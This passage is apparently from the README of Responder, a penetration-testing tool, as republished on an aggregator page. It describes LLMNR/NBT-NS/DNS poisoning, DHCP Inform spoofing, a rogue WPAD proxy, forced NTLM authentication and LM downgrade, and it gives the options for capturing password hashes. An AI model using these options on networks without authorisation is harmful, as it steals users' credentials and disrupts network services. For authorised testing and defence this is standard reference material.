    DHCP Inform Spoofing. Allows you to let the real DHCP Server issue IP addresses, and then send a DHCP Inform answer to set your IP address as a primary DNS server, and your own WPAD URL.
    Analyze mode.

    This module allows you to see NBT-NS, BROWSER, LLMNR, DNS requests on the network without poisoning any responses. Also, you can map domains, MSSQL servers, workstations passively, see if ICMP Redirects attacks are plausible on your subnet.
    Hashes

    All hashes are printed to stdout and dumped in an unique file John Jumbo compliant, using this format:(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt


    Log files are located in the "logs/" folder. Hashes will be logged and printed only once per user per hash type, unless you are using the Verbose mode (-v).
    Responder will logs all its activity to Responder-Session.log
    Analyze mode will be logged to Analyze-Session.log
    Poisoning will be logged to Poisoners-Session.log

    Additionally, all captured hashed are logged into an SQLite database which you can configure in Responder.conf
    Considerations


    This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.


    If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.


    For Ubuntu users:

    Edit this file /etc/NetworkManager/NetworkManager.conf and comment the line: dns=dnsmasq. Then kill dnsmasq with this command (as root): killall dnsmasq -9


    Any rogue server can be turned off in Responder.conf.


    This tool is not meant to work on Windows.


    For OSX, please note: Responder must be launched with an IP address for the -i flag (e.g. -i YOUR_IP_ADDR). There is no native support in OSX for custom interface binding. Using -i en1 will not work. Also to run Responder with the best experience, run the following as root:

    launchctl unload /System/Library/LaunchDaemons/com.apple.Kerberos.kdc.plist

    launchctl unload /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist

    launchctl unload /System/Library/LaunchDaemons/com.apple.smbd.plist

    launchctl unload /System/Library/LaunchDaemons/com.apple.netbiosd.plist
    Usage

    First of all, please take a look at Responder.conf and tweak it for your needs.

    Running the tool:./Responder.py [options]


    Typical Usage Example:./Responder.py -I eth0 -rPv


    Options: --version show program's version number and exit. -h, --help show this help message and exit. -A, --analyze Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding. -I eth0, --interface=eth0 Network interface to use. -i 10.0.0.21, --ip=10.0.0.21 Local IP to use (only for OSX) -e 10.0.0.22, --externalip=10.0.0.22 Poison all requests with another IP address than Responder's one. -b, --basic Return a Basic HTTP authentication. Default: NTLM -r, --wredir Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: Off -d, --NBTNSdomain Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: Off -f, --fingerprint This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query. -w, --wpad Start the WPAD rogue proxy server. Default value is Off -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port) -F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: Off -P, --ProxyAuth Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: Off --lm Force LM hashing downgrade for Windows XP/2003 and earlier. Default: Off -v, --verbose Increase verbosity.

    -->-->
    Viewing all 21247 articles
    Browse latest View live


    <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>